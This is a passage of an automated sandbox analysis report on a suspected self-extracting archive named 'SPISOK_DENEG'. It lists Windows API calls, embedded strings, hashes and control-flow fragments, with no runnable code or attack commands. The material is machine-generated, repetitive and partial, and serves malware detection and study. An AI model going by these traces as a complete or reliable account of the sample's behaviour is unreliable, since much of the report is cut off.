                                                            • TerminateProcess.KERNEL32(00000000,?,000F7DC4,00000000,0010C300,0000000C,000F7F1B,00000000,00000002,00000000), ref: 000F7E16
                                                            • ExitProcess.KERNEL32 ref: 000F7E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 595bae93e589ec4c892669aa15ba1e0d00062cb867914bc4a8ac44a12a9826db
                                                            • Instruction ID: 83b1b2c445b7cf353511005bb93764d75080e674ba1af71eacceb678c8071ecb
                                                            • Opcode Fuzzy Hash: 595bae93e589ec4c892669aa15ba1e0d00062cb867914bc4a8ac44a12a9826db
                                                            • Instruction Fuzzy Hash: E7E04F31000148ABCF016F10CD099997F69EB14341F104455F9698A932CB75DE92DA90
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 29606fa0749ee2426b096f6bff2b327ccfbff88cc4d8d1de908487aa9c6af47c
                                                            • Instruction ID: b93c9885af8cd32fd9a3feefbb3a1c43ce3f67b1038690e106dd9034f4eef60c
                                                            • Opcode Fuzzy Hash: 29606fa0749ee2426b096f6bff2b327ccfbff88cc4d8d1de908487aa9c6af47c
                                                            • Instruction Fuzzy Hash: 8E82DA71904345AEDF65DB64C895BFABBB9AF05300F0881BBE8499B343DB315A84CB71
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000EB7E5
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EB8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 000EB902
                                                            • TranslateMessage.USER32(?), ref: 000EB910
                                                            • DispatchMessageW.USER32(?), ref: 000EB91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 000EB93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 000EB960
                                                            • GetDlgItem.USER32(?,00000068), ref: 000EB983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000EB99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,001035F4), ref: 000EB9B1
                                                              • Part of subcall function 000ED453: _wcslen.LIBCMT ref: 000ED47D
                                                            • SetFocus.USER32(00000000), ref: 000EB9B8
                                                            • _swprintf.LIBCMT ref: 000EBA24
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                              • Part of subcall function 000ED4D4: GetDlgItem.USER32(00000068,0012FCB8), ref: 000ED4E8
                                                              • Part of subcall function 000ED4D4: ShowWindow.USER32(00000000,00000005,?,?,?,000EAF07,00000001,?,?,000EB7B9,0010506C,0012FCB8,0012FCB8,00001000,00000000,00000000), ref: 000ED510
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000ED51B
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,001035F4), ref: 000ED529
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000ED53F
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000ED559
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000ED59D
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000ED5AB
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000ED5BA
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000ED5E1
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,001043F4), ref: 000ED5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 000EBA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 000EBA90
                                                            • GetTickCount.KERNEL32 ref: 000EBAAE
                                                            • _swprintf.LIBCMT ref: 000EBAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 000EBAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 000EBB43
                                                            • _swprintf.LIBCMT ref: 000EBB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 000EBBD0
                                                            • GetCommandLineW.KERNEL32 ref: 000EBBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 000EBC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 000EBC6F
                                                            • Sleep.KERNEL32(00000064), ref: 000EBCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 000EBCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 000EBCEB
                                                            • _swprintf.LIBCMT ref: 000EBD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EBD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,001035F4), ref: 000EBD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 000EBD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 000EBDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000EBDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EBE68
                                                            • _wcslen.LIBCMT ref: 000EBEBE
                                                            • _swprintf.LIBCMT ref: 000EBEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 000EBF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 000EBF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 000EBF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 000EBF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 000EBF85
                                                            • SetWindowTextW.USER32(00000000,0011A472), ref: 000EBFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 000EC007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EC01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 000EC0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 000EC197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 000EC1D9
                                                              • Part of subcall function 000EC73F: __EH_prolog.LIBCMT ref: 000EC744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EC1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 3445078344-2238251102
                                                            • Opcode ID: f1fa0e74194581874bd631cab554b88aecb643279704f335088362a7b5eefdda
                                                            • Instruction ID: 223a7ae3b19f8895d25d116f2b111d1befd8e68c608edb54d221c14024486fe3
                                                            • Opcode Fuzzy Hash: f1fa0e74194581874bd631cab554b88aecb643279704f335088362a7b5eefdda
                                                            • Instruction Fuzzy Hash: CB42E370944384BEEB21ABA19D4AFFF7BBCAB01700F048065F644B65D3CBB55A85CB21

                                                            Control-flow Graph (rendered graph omitted; nodes were marked Executed / Not Executed)
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 000E087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000E088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000E08BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000E0B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000E0B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E0B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00103C7C,00000000), ref: 000E0BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 000E0C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000E0C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00103C7C,?,00000000,?,00000800), ref: 000E0C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,00103C7C,00000800,?,00000000,?,00000800), ref: 000E0C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,00103D44,00000800), ref: 000E0CD8
                                                              • Part of subcall function 000E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000E0836
                                                              • Part of subcall function 000E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000DF2D8,Crypt32.dll,00000000,000DF35C,?,?,000DF33E,?,?,?), ref: 000E0858
                                                            • _swprintf.LIBCMT ref: 000E0D4A
                                                            • _swprintf.LIBCMT ref: 000E0D96
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • AllocConsole.KERNEL32 ref: 000E0D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 000E0DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 000E0DAF
                                                            • _wcslen.LIBCMT ref: 000E0DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000E0DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 000E0DDC
                                                            • Sleep.KERNEL32(00002710), ref: 000E0DE7
                                                            • FreeConsole.KERNEL32 ref: 000E0DED
                                                            • ExitProcess.KERNEL32 ref: 000E0DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: ed20096c313d11f18807298fb94f148a87ae27b8e1768d01670e13eb6b952db4
                                                            • Instruction ID: a8fe8be62c18f84508e89b550738a7575fb2b258cf0b9fc7cbf8d8cef1e523c3
                                                            • Opcode Fuzzy Hash: ed20096c313d11f18807298fb94f148a87ae27b8e1768d01670e13eb6b952db4
                                                            • Instruction Fuzzy Hash: 39D172B1009385AFD3309F51CA89ADFBAECBB85704F50491DF2D5B6191CBF09689CB62

                                                            Control-flow Graph (rendered graph omitted; nodes were marked Executed / Not Executed)
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000EC744
                                                              • Part of subcall function 000EB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 000EB3FB
                                                            • _wcslen.LIBCMT ref: 000ECA0A
                                                            • _wcslen.LIBCMT ref: 000ECA13
                                                            • SetWindowTextW.USER32(?,?), ref: 000ECA71
                                                            • _wcslen.LIBCMT ref: 000ECAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 000ECBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 000ECC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 000ECC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0011A472), ref: 000ECC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000ECC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: befabaf28be612c9da30cb997b55eb9e6813229f87485985d8d417e0d3dc4754
                                                            • Instruction ID: de26163b13a3252bc237d5a3d73777bc714d8eb1af0a14395d5a5e2527969373
                                                            • Opcode Fuzzy Hash: befabaf28be612c9da30cb997b55eb9e6813229f87485985d8d417e0d3dc4754
                                                            • Instruction Fuzzy Hash: F8E14272900298AEDB24DBA1DD85DEE73BDAF04350F4440A6F649F7081EB749F858B61
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000DDA70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000DDAAC
                                                              • Part of subcall function 000DC29A: _wcslen.LIBCMT ref: 000DC2A2
                                                              • Part of subcall function 000E05DA: _wcslen.LIBCMT ref: 000E05E0
                                                              • Part of subcall function 000E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000DBAE9,00000000,?,?,?,00010480), ref: 000E1BA0
                                                            • _wcslen.LIBCMT ref: 000DDDE9
                                                            • __fprintf_l.LIBCMT ref: 000DDF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: 6ca1387d884718d673c867f6d7a5dfe0f6e767daf3c2f440e0c6a55c8b146d00
                                                            • Instruction ID: 2955e4d74615574ae05deb992a55466292a12adda49ee9ab0741acf6d0ae548e
                                                            • Opcode Fuzzy Hash: 6ca1387d884718d673c867f6d7a5dfe0f6e767daf3c2f440e0c6a55c8b146d00
                                                            • Instruction Fuzzy Hash: C932D171A00358EBCF64EF64C845AEE77A9FF14314F40055BFA459B382E7B1A985CB60

                                                            Control-flow Graph (rendered graph omitted; nodes were marked Executed / Not Executed)
                                                            APIs
                                                              • Part of subcall function 000EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EB579
                                                              • Part of subcall function 000EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB58A
                                                              • Part of subcall function 000EB568: IsDialogMessageW.USER32(00010480,?), ref: 000EB59E
                                                              • Part of subcall function 000EB568: TranslateMessage.USER32(?), ref: 000EB5AC
                                                              • Part of subcall function 000EB568: DispatchMessageW.USER32(?), ref: 000EB5B6
                                                            • GetDlgItem.USER32(00000068,0012FCB8), ref: 000ED4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,000EAF07,00000001,?,?,000EB7B9,0010506C,0012FCB8,0012FCB8,00001000,00000000,00000000), ref: 000ED510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000ED51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,001035F4), ref: 000ED529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000ED53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000ED559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000ED59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000ED5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000ED5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000ED5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,001043F4), ref: 000ED5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: d2a58046def1bd78da8e2d8159e27253e7feb3deeb1889c59c2bfd0d54a80852
                                                            • Instruction ID: aea630d421f6722691402ea59792ab3c4f9156542ac83c49503a8c3daa94a60f
                                                            • Opcode Fuzzy Hash: d2a58046def1bd78da8e2d8159e27253e7feb3deeb1889c59c2bfd0d54a80852
                                                            • Instruction Fuzzy Hash: 0131F471145742BFE305DF20DC4AFAB7FACEB82718F004509F6A1965E1DB648A48C77A

                                                            Control-flow Graph (rendered graph omitted; nodes were marked Executed / Not Executed)
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 000ED7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 000ED8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 000ED91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 000ED959
                                                            • CloseHandle.KERNEL32(?), ref: 000ED97F
                                                            • ShowWindow.USER32(?,00000001), ref: 000ED9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: de5efcc5fb6160e4493fa49df371f09f5c4e02d4de68af46be8984e80e10ee27
                                                            • Instruction ID: c8f688b8c333ab27f413860a7f9b57f6b4418313b0700d90f434f7810f40ac2a
                                                            • Opcode Fuzzy Hash: de5efcc5fb6160e4493fa49df371f09f5c4e02d4de68af46be8984e80e10ee27
                                                            • Instruction Fuzzy Hash: F851C2711083C0AEEB709B26DD44BABBBE5EF41744F04041FF9C5A71A2EBB18985CB52

                                                            Control-flow Graph (rendered graph omitted; nodes were marked Executed / Not Executed)
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000F5695,000F5695,?,?,?,000FABAC,00000001,00000001,2DE85006), ref: 000FA9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000FABAC,00000001,00000001,2DE85006,?,?,?), ref: 000FAA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000FAB35
                                                            • __freea.LIBCMT ref: 000FAB42
                                                              • Part of subcall function 000F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            • __freea.LIBCMT ref: 000FAB4B
                                                            • __freea.LIBCMT ref: 000FAB70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 859241e131600dc3f66fb794307f4b10c3fb84527f1de351db40086d99c5d000
                                                            • Instruction ID: 8a842ff686057d1ecb73e9dbe7e7a2acd76c325d5715676367ddcb0806643a40
                                                            • Opcode Fuzzy Hash: 859241e131600dc3f66fb794307f4b10c3fb84527f1de351db40086d99c5d000
                                                            • Instruction Fuzzy Hash: 7051D3B271021AAFDB258F64CC41EBFB7EAEB46710F154628FE08D6542DB74DC40E692

                                                            Control-flow Graph
                                                            control_flow_graph 975 f3b72-f3b7c 976 f3bee-f3bf1 975->976 977 f3b7e-f3b8c 976->977 978 f3bf3 976->978 980 f3b8e-f3b91 977->980 981 f3b95-f3bb1 LoadLibraryExW 977->981 979 f3bf5-f3bf9 978->979 982 f3c09-f3c0b 980->982 983 f3b93 980->983 984 f3bfa-f3c00 981->984 985 f3bb3-f3bbc GetLastError 981->985 982->979 987 f3beb 983->987 984->982 986 f3c02-f3c03 FreeLibrary 984->986 988 f3bbe-f3bd3 call f6088 985->988 989 f3be6-f3be9 985->989 986->982 987->976 988->989 992 f3bd5-f3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,000F3C35,?,?,00132088,00000000,?,000F3D60,00000004,InitializeCriticalSectionEx,00106394,InitializeCriticalSectionEx,00000000), ref: 000F3C03
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-
                                                            • API String ID: 3664257935-2084034818
                                                            • Opcode ID: 523c1caa7d2cfbe7766319ade48a99504d618e9393013b23ccb1c1b4685ec91f
                                                            • Instruction ID: 7eeef5fdf96dd615913317ba964a44c020c656a6c3457d6230bf4c965ca597b8
                                                            • Opcode Fuzzy Hash: 523c1caa7d2cfbe7766319ade48a99504d618e9393013b23ccb1c1b4685ec91f
                                                            • Instruction Fuzzy Hash: 76110A31A05228ABCB318B689C51BAD77E49F01770F210110FB55FBA90D770EF4096D0

                                                            Control-flow Graph
